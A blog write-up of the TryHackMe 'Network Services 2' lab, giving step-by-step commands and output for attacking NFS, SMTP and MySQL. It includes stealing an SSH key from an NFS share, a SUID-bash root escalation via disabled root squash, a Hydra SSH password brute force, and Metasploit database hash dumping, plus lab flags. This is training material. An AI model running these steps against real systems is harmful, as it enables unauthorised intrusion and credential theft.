[THM] Network Services 2

2024-06-26

This is the second series on Network Services in the Network Exploitation Basics module of the Complete Beginner path. I really learned a lot and a lot of new protocols and tools were introduced.

NFS

Understanding NFS

What does NFS stand for?

Network File System

What process allows an NFS client to interact with a remote directory as though it was a physical drive?

Mounting

By using NFS, users and programs can access files on remote systems as if they were local files. It does this by mounting all, or a portion of a file system on a server. The portion of the file system that is mounted can be accessed by clients with whatever privileges are assigned to each file.

What does NFS use to represent files and directories on the server?

file handle

The server checks if the user has permission to mount whatever directory has been requested. It will then return a file handle which uniquely identifies each file and directory that is on the server.

What protocol does NFS use to communicate between the server and client?

RPC

What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1/parameter 2

user id / group id

Can a Windows NFS server share files with a Linux client? (Y/N)

Can a Linux NFS server share files with a MacOS client? (Y/N)

Using the NFS protocol, you can transfer files between computers running Windows and other non-Windows operating systems, such as Linux, MacOS or Unix. A computer running Windows Server can act as an NFS file server for other non-Windows client computers. Likewise, NFS allows a Windows-based computer running Windows server to access files stored on a non-Windows NFS server.

What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.

4.2

Enumerating NFS

Requirements

In order to do a more advanced enumeration of the NFS server, and shares – we’re going to need a few tools.

NFS-Common

It is important to have this package installed on any machine that uses NFS, either as client or server. It includes programs such as: lockd, statd, showmount, nfsstat, gssd, idmapd and mount.nfs. Primarily, we are concerned with “showmount” and “mount.nfs” as these are going to be most useful to us when it comes to extracting information from the NFS share
Port Scanning
Mounting NFS shares

Your client’s system needs a directory where all the content shared by the host server in the export folder can be accessed. You can create this folder anywhere on your system. Once you’ve created this mount point, you can use the “mount” command to connect the NFS share to the mount point on your machine like so: sudo mount -t nfs IP:share /tmp/mount/ -nolock

sudo : run as root
mount : execute the mount command
-t nfs : type of device to mount, then specifying that it’s NFS
IP:share: the IP address of the NFS server, and the name of the share we wish to mount
-nolock: specifies not to use NLM locking

Conduct a thorough port scan of your choosing, how many ports are open?

 1PORT STATE SERVICE REASON VERSION
 222/tcp open ssh syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 3| ssh-hostkey:
 4| 2048 73:92:8e:04:de:40:fb:9c:90:f9:cf:42:70:c8:45:a7 (RSA)
 5| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDEQIafB/d+8xhCVa/WJUjV/xtzU7h9fmdPMEVWEobVN59eusBnBD19rp08xrjFOkvHdLSe3XCaDSSreOd4m9If73vzGT/dpXO4kj2Je+p2ALDLLr0vbA+/EVrFJjsbKJ6OLNWGw2nD6romEld++MLOI0SbY9zaM3ov4hwQZ2Fnp9QF5OAt3zqIyxk5Xr99gpm/i4mk3YtA+3I1WHpdLE5Uw41aOVYapowLh+sG1Uyi8dxnI7WJ04DywrUftJam/ajlY6QAiWDR96QRw7RuNJ+8dOLDj7JT+aNREvSTrSWahn+clpIwCgDuVUYy36BEfyTpC/JyTtuS077Bj8vv8NLl
 6| 256 6d:63:d6:b8:0a:67:fd:86:f1:22:30:2b:2d:27:1e:ff (ECDSA)
 7| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIL2RAJwSBEjlVNFa6km4BnXrbfxBqanFGsc8V7KPraGwGaJkBCtaUpVRQmPXQHhNePswl4UI2rsxVLcw/DYQ4s=
 8| 256 bd:08:97:79:63:0f:80:7c:7f:e8:50:dc:59:cf:39:5e (EdDSA)
 9|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINqYlGyJzySWsOMejWbc9mf3mFzerVbrty8i6PCOR7lv
10111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
11| rpcinfo:
12| program version port/proto service
13| 100000 2,3,4 111/tcp rpcbind
14| 100000 2,3,4 111/udp rpcbind
15| 100003 3 2049/udp nfs
16| 100003 3,4 2049/tcp nfs
17| 100005 1,2,3 52691/tcp mountd
18| 100005 1,2,3 57133/udp mountd
19| 100021 1,3,4 34475/tcp nlockmgr
20| 100021 1,3,4 48911/udp nlockmgr
21| 100227 3 2049/tcp nfs_acl
22|_ 100227 3 2049/udp nfs_acl
232049/tcp open nfs_acl syn-ack ttl 64 3 (RPC #100227)
2434475/tcp open nlockmgr syn-ack ttl 64 1-4 (RPC #100021)
2546359/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
2652691/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
2756583/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)

Which port contains the service we’re looking to enumerate?

1| 100003 3 2049/udp nfs
2| 100003 3,4 2049/tcp nfs

Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?

/home

1root@ip-10-10-87-146:~# /usr/sbin/showmount -e 10.10.14.167
2Export list for 10.10.14.167:
3/home \*

Time to mount the share to our local machine!

First, use mkdir /tmp/mount to create a directory on your machine to mount the share to. This is in the /tmp directory - so be aware that it will be removed on restart.

Then, use the mount command we broke down earlier to mount the NFS share to your local machine. Change directory to where you mounted the share – what is the name of the folder inside?

cappucino

1root@ip-10-10-87-146:~# mkdir /tmp/mount
2root@ip-10-10-87-146:~# sudo mount -t nfs 10.10.14.167:home /tmp/mount/ -nolock
3root@ip-10-10-87-146:~# cd /tmp/mount
4root@ip-10-10-87-146:/tmp/mount# ls
5cappucino

Have a look inside the directory, look at the files. Looks like we’re inside a user’s home directory…

Interesting! Let’s do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?

.ssh

 1root@ip-10-10-87-146:/tmp/mount/cappucino# ls
 2root@ip-10-10-87-146:/tmp/mount/cappucino# ls -al
 3total 36
 4drwxr-xr-x 5 ubuntu ubuntu 4096 Jun 4 2020 .
 5drwxr-xr-x 3 root root 4096 Apr 21 2020 ..
 6-rw------- 1 ubuntu ubuntu 5 Jun 4 2020 .bash_history
 7-rw-r--r-- 1 ubuntu ubuntu 220 Apr 4 2018 .bash_logout
 8-rw-r--r-- 1 ubuntu ubuntu 3771 Apr 4 2018 .bashrc
 9drwx------ 2 ubuntu ubuntu 4096 Apr 22 2020 .cache
10drwx------ 3 ubuntu ubuntu 4096 Apr 22 2020 .gnupg
11-rw-r--r-- 1 ubuntu ubuntu 807 Apr 4 2018 .profile
12drwx------ 2 ubuntu ubuntu 4096 Apr 22 2020 .ssh
13-rw-r--r-- 1 ubuntu ubuntu 0 Apr 22 2020 .sudo_as_admin_successful

Which of these keys is most useful to us?

id_rsa

id_rsa is the default name of an SSH identity file.

Copy this file to a different location your local machine, and change the permission to “600” using chmod 600 [file].

Assuming we were right about what type of directory this is, we can pretty easily work out the name of the user this key corresponds to.

Can we log into the machine using ssh -i <key-file> <username>@\<ip> ? (Y/N).

1root@ip-10-10-233-18:~# cp /tmp/mount/cappucino/.ssh/id_rsa ~
2root@ip-10-10-233-18:~# ls
3burp.json Desktop id_rsa Pictures Rooms thinclient_drives
4CTFBuilder Downloads Instructions Postman Scripts Tools
5root@ip-10-10-233-18:~# chmod 600 id_rsa
6root@ip-10-10-233-18:~# ssh -i id_rsa cappucino@10.10.14.167

 1Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)
 2
 3- Documentation: https://help.ubuntu.com
 4- Management: https://landscape.canonical.com
 5- Support: https://ubuntu.com/advantage
 6
 7System information as of Tue Jun 25 05:47:40 UTC 2024
 8
 9System load: 0.0 Processes: 102
10Usage of /: 45.2% of 9.78GB Users logged in: 0
11Memory usage: 16% IP address for eth0: 10.10.14.167
12Swap usage: 0%
13
1444 packages can be updated.
150 updates are security updates.
16
17Last login: Thu Jun 4 14:37:50 2020
18cappucino@polonfs:~$

Exploiting NFS

What is root_squash?

By default, on NFS shares- Root Squashing is enabled, and prevents anyone connecting to the NFS share from having root access to the NFS volume. Remote root users are assigned a user “nfsnobody” when connected, which has the least local privileges. Not what we want. However, if this is turned off, it can allow the creation of SUID bit files, allowing a remote user root access to the connected system.

SUID

So, what are files with the SUID bit set? Essentially, this means that the file or files can be run with the permissions of the file(s) owner/group. In this case, as the super-user. We can leverage this to get a shell with these privileges!

Due to compatibility reasons, we will obtain the bash executable directly from the target machine. With the key obtained in the previous task, we can use SCP with the command scp -i key_name username@10.10.14.168:/bin/bash ~/Downloads/bash to download it onto our attacking machine.

Here’s a step by step of the actions we’re taking, and how they all tie together to allow us to gain a root shell:

NFS Access
Gain Low Privilege Shell
Upload Bash Executable to the NFS share
Set SUID Permissions Through NFS Due To Misconfigured Root Squash
Login Through SSH
Execute SUID Bit Bash Executable
Root Access

First, change directory to the mount point on your machine, where the NFS share should still be mounted, and then into the user’s home directory.

root@ip-10-10-233-18:/tmp/mount/cappucino#

Download the bash executable to your Downloads directory. Then use “cp ~/Downloads/bash .” to copy the bash executable to the NFS share. The copied bash shell must be owned by a root user, you can set this using “sudo chown root bash”

 1root@ip-10-10-233-18:/tmp/mount/cappucino/.ssh# scp -i id_rsa cappucino@10.10.14.167:/bin/bash ~/Downloads/bash
 2bash 100% 1087KB 85.0MB/s 00:00
 3root@ip-10-10-233-18:/tmp/mount/cappucino/.ssh# cd ..
 4root@ip-10-10-233-18:/tmp/mount/cappucino# ls
 5root@ip-10-10-233-18:/tmp/mount/cappucino# ls -al
 6total 36
 7drwxr-xr-x 5 ubuntu ubuntu 4096 Jun 4 2020 .
 8drwxr-xr-x 3 root root 4096 Apr 21 2020 ..
 9-rw------- 1 ubuntu ubuntu 20 Jun 25 07:00 .bash_history
10-rw-r--r-- 1 ubuntu ubuntu 220 Apr 4 2018 .bash_logout
11-rw-r--r-- 1 ubuntu ubuntu 3771 Apr 4 2018 .bashrc
12drwx------ 2 ubuntu ubuntu 4096 Apr 22 2020 .cache
13drwx------ 3 ubuntu ubuntu 4096 Apr 22 2020 .gnupg
14-rw-r--r-- 1 ubuntu ubuntu 807 Apr 4 2018 .profile
15drwx------ 2 ubuntu ubuntu 4096 Apr 22 2020 .ssh
16-rw-r--r-- 1 ubuntu ubuntu 0 Apr 22 2020 .sudo_as_admin_successful
17root@ip-10-10-233-18:/tmp/mount/cappucino# cp ~/Downloads/bash .
18root@ip-10-10-233-18:/tmp/mount/cappucino# ls
19bash
20root@ip-10-10-233-18:/tmp/mount/cappucino# sudo chown root bash

Now, we’re going to add the SUID bit permission to the bash executable we just copied to the share using sudo chmod +[permission] bash. What letter do we use to set the SUID bit set using chmod?

The letter s is used to set the setuid (SUID) bit using the chmod command in Linux:

chmod u+s </path/to/the/file>: Sets the setuid bit symbolically
chmod u-s: Removes the setuid bit

Let’s do a sanity check, let’s check the permissions of the bash executable using ls -la bash. What does the permission set look like? Make sure that it ends with -sr-x.

-rwsr-sr-x

1root@ip-10-10-233-18:/tmp/mount/cappucino# sudo chmod +s bash
2root@ip-10-10-233-18:/tmp/mount/cappucino# ls -la bash
3-rwsr-sr-x 1 root root 1113504 Jun 25 07:04 bash

Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Let’s run it with “./bash -p”. The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.

Great! If all’s gone well you should have a shell as root! What’s the root flag?

THM{nfs_got_pwned}

1cappucino@polonfs:~$ ls
2bash
3cappucino@polonfs:~$ ./bash -p
4bash-4.4# whoami
5root

1bash-4.4# whoami
2root
3bash-4.4# ls /root
4root.txt
5bash-4.4# cat /root/root.txt
6THM{nfs_got_pwned}
7bash-4.4#

SMTP (Simple Mail Transfer Protocol)

Understanding SMTP

The SMTP server performs three basic functions:

It verifies who is sending emails through the SMTP server.
It sends the outgoing mail
If the outgoing mail can’t be delivered it sends the message back to the sender.

POP and IMAP

POP, Post Office Protocol, and IMAP, Internet Message Access Protocol, are both email protocols who are responsible for the transfer of email between a client and a mail server. The main difference is in POP is more simplistic approach of downloading the inbox from the mail server, to the client. Where IMAP will synchronize the current inbox, with the new mail on the server, downloading anything new.

What does SMTP stand for?

Simple Mail Transfer Protocol

What does SMTP handle the sending of? ``` emails ```
What is the first step in the SMTP process?

SMTP handshake

What is the default SMTP port?

Where does the SMTP server send the email if the recipient's server is not available?

SMTP Queue

On what server does the Email ultimately end up on?

POP/IMAP

Can a Linux machine run an SMTP server?

Can a Windows machine run an SMTP server?

Enumerating SMTP

Poorly configured or vulnerable mail servers can often provide an initial foothold into a network. We want to fingerprint the server to make our targeting as precise as possible before launching an attack. We can use the smtp_version module in Metasploit.

The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual addresses of user’s aliases and lists of email). We can do this manually, over a telnet connection – however Metasploit provides a handy module called smtp_enum that will do the legwork for us.

First, let’s run a port scan against the target machine, same as last time. What port is SMTP running on?

 1root@ip-10-10-35-22:~# nmap -sV 10.10.54.3
 2
 3Starting Nmap 7.60 ( https://nmap.org ) at 2024-06-26 03:31 BST
 4Nmap scan report for ip-10-10-54-3.eu-west-1.compute.internal (10.10.54.3)
 5Host is up (0.00069s latency).
 6Not shown: 998 closed ports
 7PORT STATE SERVICE VERSION
 822/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 925/tcp open smtp Postfix smtpd
10MAC Address: 02:4B:FA:CD:BD:EB (Unknown)
11Service Info: Host: polosmtp.home; OS: Linux; CPE: cpe:/o:linux:linux_kernel
12
13Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
14Nmap done: 1 IP address (1 host up) scanned in 2.53 seconds

Okay, now we know what port we should be targeting, let’s start up Metasploit. What command do we use to do this?

msfconsole

Let’s search for the module smtp_version, what’s its full module name?

auxiliary/scanner/smtp/smtp_version

 1msf6 > search smtp_version
 2
 3# Matching Modules
 4
 5# Name Disclosure Date Rank Check Description
 6
 7---
 8
 90 auxiliary/scanner/smtp/smtp_version normal No SMTP Banner Grabber
10
11Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_version

Great, now select the module and list the options. How do we do this?

options

 1msf6 > use 0
 2msf6 auxiliary(scanner/smtp/smtp_version) > options
 3
 4Module options (auxiliary/scanner/smtp/smtp_version):
 5
 6Name Current Setting Required Description
 7
 8---
 9
10RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploi
11t.html
12RPORT 25 yes The target port (TCP)
13THREADS 1 yes The number of concurrent threads (max one per host)
14
15View the full module info with the info, or info -d command.

Have a look through the options, does everything seem correct? What is the option we need to set?

RHOSTS

Set that to the correct value for your target machine. Then run the exploit. What’s the system mail name?

polosmtp.home

1msf6 auxiliary(scanner/smtp/smtp_version) > set rhosts 10.10.54.3
2rhosts => 10.10.54.3
3msf6 auxiliary(scanner/smtp/smtp_version) > run
4
5[+] 10.10.54.3:25 - 10.10.54.3:25 SMTP 220 polosmtp.home ESMTP Postfix (Ubuntu)\x0d\x0a
6[*] 10.10.54.3:25 - Scanned 1 of 1 hosts (100% complete)
7[*] Auxiliary module execution completed

What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.

Postfix

Good! We’ve now got a good amount of information on the target system to move onto the next stage. Let’s search for the module smtp_enum, what is the full module name?

auxiliary/scanner/smtp/smtp_enum

 1msf6 auxiliary(scanner/smtp/smtp_version) > search smtp_enum
 2
 3# Matching Modules
 4
 5# Name Disclosure Date Rank Check Description
 6
 7---
 8
 90 auxiliary/scanner/smtp/smtp_enum normal No SMTP User Enumeration Utility
10
11Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smtp/smtp_enum
12
13msf6 auxiliary(scanner/smtp/smtp_version) >

We’re going to be using the top-usernames-shortlist.txt wordlist from the usernames subsection of seclists (/usr/share/wordlists/SecLists/usernames if you have it installed). Seclists is an amazing collection of wordlists. If you’re running Kali or Parrot you can install seclists with: sudo apt install seclists.

What option do we need to set to the wordlist’s path?

USER_FILE

 1msf6 auxiliary(scanner/smtp/smtp_enum) > options
 2
 3Module options (auxiliary/scanner/smtp/smtp_enum):
 4
 5Name Current Setting Required Description
 6
 7---
 8
 9RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metaspl
10oit/basics/using-metasploit.html
11RPORT 25 yes The target port (TCP)
12THREADS 1 yes The number of concurrent threads (max one per host)
13UNIXONLY true yes Skip Microsoft bannered servers when testing unix users
14USER_FILE /opt/metasploit-framework/embedded/fram yes The file that contains a list of probable users accounts.
15ework/data/wordlists/unix_users.txt
16
17View the full module info with the info, or info -d command.

Once we’ve set this option, what is the other essential parameter we need to set?

RHOSTS

 1msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
 2USER_FILE => /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt
 3msf6 auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 10.10.54.3
 4RHOSTS => 10.10.54.3
 5msf6 auxiliary(scanner/smtp/smtp_enum) > run
 6
 7[*] 10.10.54.3:25 - 10.10.54.3:25 Banner: 220 polosmtp.home ESMTP Postfix (Ubuntu)
 8[+] 10.10.54.3:25 - 10.10.54.3:25 Users found: administrator
 9[*] 10.10.54.3:25 - Scanned 1 of 1 hosts (100% complete)
10[*] Auxiliary module execution completed

What username is returned?

administrator

1[+] 10.10.54.3:25 - 10.10.54.3:25 Users found: administrator

Exploiting SMTP

At the end of our Enumeration section we have a few vital pieces of information:

A user account name
The type of SMTP server and Operating System running.

We know from our port scan, that the only other open port on this machine is an SSH login. We’re going to use this information to try and bruteforce the password of the SSH login for our user using Hydra.

There is a wide array of customizability when it comes to using Hydra. Hydra uses dictionary attacks primarily, both Kali Linux and Parrot OS have many different wordlists in the /usr/share/wordlists directory – If you would like to browse and find a different wordlists to the widely used “rockyou.txt”.

The syntax for the command we’re going to use to find the password is this:

hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV 10.10.54.3 ssh

hydra: runs the hydra tool
-t 16: number of parallel connections per target
-l [user]: points to the user whose account you’re trying to compromise
-P [path to dictionary]: points to the file containing the list of possible passwords
-vV: sets verbose mode to very verbose, shows the login+pass combination for each attempt
[machine ip]: the IP address of the target machine
ssh / protocol: sets the protocol

What is the password of the user we found during our enumeration stage?

alejandro

 1root@ip-10-10-35-22:~# hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.54.3 ssh
 2Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 3
 4Hydra (http://www.thc.org/thc-hydra) starting at 2024-06-26 04:28:32
 5[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
 6[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
 7[DATA] attacking ssh://10.10.54.3:22/
 8[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
 9[INFO] Testing if password authentication is supported by ssh://administrator@10.10.54.3:22
10[INFO] Successful, password authentication is supported by ssh://10.10.54.3:22
11[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "123456" - 1 of 14344398 [child 0] (0/0)
12[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "12345" - 2 of 14344398 [child 1] (0/0)

1[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "killer" - 143 of 14344401 [child 11] (0/3)
2[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "sandra" - 144 of 14344401 [child 14] (0/3)
3[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "alejandro" - 145 of 14344401 [child 15] (0/3)
4[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "buster" - 146 of 14344401 [child 10] (0/3)
5[ATTEMPT] target 10.10.54.3 - login "administrator" - pass "george" - 147 of 14344401 [child 4] (0/3)
6[22][ssh] host: 10.10.54.3 login: administrator password: alejandro
7[STATUS] attack finished for 10.10.54.3 (waiting for children to complete tests)
81 of 1 target successfully completed, 1 valid password found

Great! Now, let’s SSH into the server as the user, what is contents of smtp.txt

THM{who_knew_email_servers_were_c00l?}

 1root@ip-10-10-35-22:~# ssh administrator@10.10.54.3
 2The authenticity of host '10.10.54.3 (10.10.54.3)' can't be established.
 3ECDSA key fingerprint is SHA256:ABheODwYmk63/Mmp8cbMSoVTNv3vcgWbzukZoGMb62I.
 4Are you sure you want to continue connecting (yes/no)? yes
 5Warning: Permanently added '10.10.54.3' (ECDSA) to the list of known hosts.
 6administrator@10.10.54.3's password:
 7Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-111-generic x86_64)
 8
 9- Documentation: https://help.ubuntu.com
10- Management: https://landscape.canonical.com
11- Support: https://ubuntu.com/advantage
12
13System information as of Wed Jun 26 03:31:06 UTC 2024
14
15System load: 0.01 Processes: 91
16Usage of /: 43.9% of 9.78GB Users logged in: 0
17Memory usage: 15% IP address for eth0: 10.10.54.3
18Swap usage: 0%
19
2087 packages can be updated.
2135 updates are security updates.
22
23Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
24
25Last login: Wed Apr 22 22:21:42 2020 from 192.168.1.110
26administrator@polosmtp:~$ ls
27dead.letter Maildir smtp.txt
28administrator@polosmtp:~$ cat smtp.txt
29THM{who_knew_email_servers_were_c00l?}

MySQL

Understanding MySQL

MySQL is a relational database management system (RDBMS) based on Structured Query Language (SQL).

MySQL, as an RDBMS, is made up of the server and utility programs that help in the administration of MySQL databases.

MySQL creates a database for storing and manipulating data, defining the relationship of each table.
Clients make requests by making specific statements in SQL.
The server will respond to the client with whatever information has been requested.

What type of software is MySQL?

Relational Database Management System

What language is MySQL based on?

SQL

What communication model does MySQL use?

client-server

What is a common application of MySQL?

back end database

What major social network uses MySQL as their back-end database? This will require further research.

Facebook

Enumerating MySQL

Typically, you will have gained some initial credentials from enumerating other services that you can then use to enumerate and exploit the MySQL service. For the sake of the scenario, we’re going to assume that we found the credentials: "root:password" while enumerating subdomains of a web server. After trying the login against SSH unsuccessfully, you decide to try it against MySQL.

As always, let’s start out with a port scan, so we know what port the service we’re trying to attack is running on. What port is MySQL using?

1PORT STATE SERVICE VERSION
222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
33306/tcp open mysql MySQL 5.7.29-0ubuntu0.18.04.1

Good, now – we think we have a set of credentials. Let’s double check that by manually connecting to the MySQL server. We can do this using command mysql -h [IP] -u [username] -p.

 1root@ip-10-10-35-22:~# mysql -h 10.10.151.196 -u root -p
 2Enter password:
 3Welcome to the MySQL monitor. Commands end with ; or \g.
 4Your MySQL connection id is 3
 5Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
 6
 7Copyright (c) 2000, 2023, Oracle and/or its affiliates.
 8
 9Oracle is a registered trademark of Oracle Corporation and/or its
10affiliates. Other names may be trademarks of their respective
11owners.
12
13Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
14
15mysql>

Okay, we know that our login credentials work. Let’s quit out of this session with “exit” and launch up Metasploit.

 1root@ip-10-10-35-22:~# msfconsole
 2This copy of metasploit-framework is more than two weeks old.
 3Consider running 'msfupdate' to update to the latest version.
 4
 5         .                                         .
 6
 7.
 8
 9      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
10       '   dB'                     BBP
11    dB'dB'dB' dBBP     dBP     dBP BB
12
13dB'dB'dB' dBP dBP dBP BB
14dB'dB'dB' dBBBBP dBP dBBBBBBB
15
16                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
17          .                  .                  dB' dBP    dB'.BP
18                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
19                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
20                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP
21
22                                                                    .
23                .
24        o                  To boldly go where no
25                            shell has gone before
26
27
28       =[ metasploit v6.3.5-dev-                          ]
29
30- -- --=[ 2294 exploits - 1201 auxiliary - 410 post ]
31- -- --=[ 968 payloads - 45 encoders - 11 nops ]
32- -- --=[ 9 evasion ]
33
34Metasploit tip: Adapter names can be used for IP params
35set LHOST eth0
36Metasploit Documentation: https://docs.metasploit.com/
37
38msf6 >

We’re going to be using the mysql_sql module. Search for, select and list the options it needs. What three options do we need to set? (in descending order).

PASSWORD
RHOSTS
USERNAME

 1msf6 > search mysql_sql
 2
 3# Matching Modules
 4
 5# Name Disclosure Date Rank Check Description
 6
 7---
 8
 90 auxiliary/admin/mysql/mysql_sql normal No MySQL SQL Generic Query
10
11Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/mysql/mysql_sql
12
13msf6 > use 0
14msf6 auxiliary(admin/mysql/mysql_sql) > options
15
16Module options (auxiliary/admin/mysql/mysql_sql):
17
18Name Current Setting Required Description
19
20---
21
22PASSWORD no The password for the specified username
23RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
24oit.html
25RPORT 3306 yes The target port (TCP)
26SQL select version() yes The SQL to execute.
27USERNAME no The username to authenticate as
28
29View the full module info with the info, or info -d command.

1msf6 auxiliary(admin/mysql/mysql_sql) > set USERNAME root
2USERNAME => root
3msf6 auxiliary(admin/mysql/mysql_sql) > set RHOSTS 10.10.151.196
4RHOSTS => 10.10.151.196
5msf6 auxiliary(admin/mysql/mysql_sql) > set PASSWORD password
6PASSWORD => password

Run the exploit. By default it will test with the select version() command, what result does this give you?

5.7.29-0ubuntu0.18.04.1

1msf6 auxiliary(admin/mysql/mysql_sql) > run
2[*] Running module against 10.10.151.196
3
4[*] 10.10.151.196:3306 - Sending statement: 'select version()'...
5[*] 10.10.151.196:3306 - | 5.7.29-0ubuntu0.18.04.1 |
6[*] Auxiliary module execution completed
7msf6 auxiliary(admin/mysql/mysql_sql) >

Great! We know that our exploit is landing as planned. Let’s try to gain some more ambitious information. Change the sql option to show databases. How many databases are returned?

 1msf6 auxiliary(admin/mysql/mysql_sql) > set SQL show databases
 2SQL => show databases
 3msf6 auxiliary(admin/mysql/mysql_sql) > options
 4
 5Module options (auxiliary/admin/mysql/mysql_sql):
 6
 7Name Current Setting Required Description
 8
 9---
10
11PASSWORD password no The password for the specified username
12RHOSTS 10.10.151.196 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
13it.html
14RPORT 3306 yes The target port (TCP)
15SQL show databases yes The SQL to execute.
16USERNAME root no The username to authenticate as
17
18View the full module info with the info, or info -d command.

1msf6 auxiliary(admin/mysql/mysql_sql) > run
2[*] Running module against 10.10.151.196
3
4[*] 10.10.151.196:3306 - Sending statement: 'show databases'...
5[*] 10.10.151.196:3306 - | information_schema |
6[*] 10.10.151.196:3306 - | mysql |
7[*] 10.10.151.196:3306 - | performance_schema |
8[*] 10.10.151.196:3306 - | sys |
9[*] Auxiliary module execution completed

Exploiting MySQL

Take a sanity check before moving on to try and exploit the database fully. We know:

MySQL server credentials
The version of MySQL running
The number of Databases, and their names.

Schema In MySQL, physically, a schema is synonymous with a database. You can substitute the keyword schema instead of database in MySQL SQL syntax, for example using CREATE SCHEMA instead of CREATE DATABASE. Some other database products draw a distinction.

Hashes Hashes are the product of a cryptographic algorithm to turn a variable length input into a fixed length output. In MySQL hashes can be used in different ways, for instance to index data into a hash table. Each hash has a unique ID that serves as a pointer to the original data.

First, let’s search for and select the mysql_schemadump module. What’s the module’s full name?

auxiliary/scanner/mysql/mysql_schemadump

1msf6 auxiliary(admin/mysql/mysql_sql) > search mysql_schemadump
2
3# Matching Modules
4
5# Name Disclosure Date Rank Check Description
6
7---
8
90 auxiliary/scanner/mysql/mysql_schemadump normal No MYSQL Schema Dump

Great! Now, you’ve done this a few times by now so I’ll let you take it from here. Set the relevant options, run the exploit. What’s the name of the last table that gets dumped?

x$waits_global_by_latency

 1msf6 auxiliary(scanner/mysql/mysql_schemadump) > options
 2
 3Module options (auxiliary/scanner/mysql/mysql_schemadump):
 4
 5Name Current Setting Required Description
 6
 7---
 8
 9DISPLAY_RESULTS true yes Display the Results to the Screen
10PASSWORD no The password for the specified username
11RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
12etasploit.html
13RPORT 3306 yes The target port (TCP)
14THREADS 1 yes The number of concurrent threads (max one per host)
15USERNAME no The username to authenticate as
16
17View the full module info with the info, or info -d command.
18
19msf6 auxiliary(scanner/mysql/mysql_schemadump) > set USERNAME root
20USERNAME => root
21msf6 auxiliary(scanner/mysql/mysql_schemadump) > set RHOSTS 10.10.151.196
22RHOSTS => 10.10.151.196
23msf6 auxiliary(scanner/mysql/mysql_schemadump) > set PASSWORD password
24PASSWORD => password

 1- TableName: x$waits_global_by_latency
 2  Columns:
 3  - ColumnName: events
 4    ColumnType: varchar(128)
 5  - ColumnName: total
 6    ColumnType: bigint(20) unsigned
 7  - ColumnName: total_latency
 8    ColumnType: bigint(20) unsigned
 9  - ColumnName: avg_latency
10    ColumnType: bigint(20) unsigned
11  - ColumnName: max_latency
12    ColumnType: bigint(20) unsigned
13
14[*] 10.10.151.196:3306 - Scanned 1 of 1 hosts (100% complete)
15[*] Auxiliary module execution completed
16msf6 auxiliary(scanner/mysql/mysql_schemadump) >

Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better… search for and select the mysql_hashdump module. What’s the module’s full name?

auxiliary/scanner/mysql/mysql_hashdump

 1msf6 auxiliary(scanner/mysql/mysql_schemadump) > search mysql_hashdump
 2
 3# Matching Modules
 4
 5# Name Disclosure Date Rank Check Description
 6
 7---
 8
 90 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
101 auxiliary/analyze/crack_databases normal No Password Cracker: Databases

